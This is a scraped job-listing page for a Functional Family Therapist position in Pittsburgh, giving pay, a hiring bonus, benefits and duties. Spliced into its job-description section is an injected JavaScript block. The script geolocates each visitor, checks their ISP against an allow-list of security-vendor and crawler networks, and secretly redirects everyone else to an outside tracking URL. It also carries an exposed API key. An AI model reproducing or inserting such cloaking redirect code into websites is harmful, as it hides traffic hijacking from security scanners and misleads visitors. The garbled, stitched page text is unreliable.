Functional Family Therapist – $4,000 Hiring Bonus

Pittsburgh, PA
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/849432040fa37b1b/45ec26ddd95e97d4ec85089678d95ddd3f5ad057a568b5f18bf3f9bca7782414/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

This full-time Therapist II – Functional Family position offers a $4,000 hiring bonus paid in installments and a competitive salary of $49,000–$52,000 annually.
Benefits include a $2,000 tuition reimbursement per semester, medical/dental/vision insurance, paid holidays, PTO, parental leave, life and disability insurance, retirement plans with matching, continuing education, and flexible schedule options.

  • The role involves providing in-home, community-based Family Therapy using the Evidence-Based Functional Family Therapy model, managing a caseload of 10-12 families, and delivering weekly sessions over 4-6 months.
  • Qualifications include a Master’s degree in social work, counseling, marriage and family therapy, or related fields, with 2 years of relevant experience, along with required clearances, a valid PA driver’s license, and access to insured transportation.
  • Key skills involve strong clinical, decision-making, cultural sensitivity, and teamwork abilities, along with flexibility to work evenings and weekends to meet families’ needs.
  • Responsibilities encompass delivering FFT-CW services with fidelity, engaging families, completing assessments, documenting cases, and collaborating with community stakeholders.

  • Apply via Indeed or directly on the website. The organization promotes an inclusive environment and is an Equal Opportunity Employer.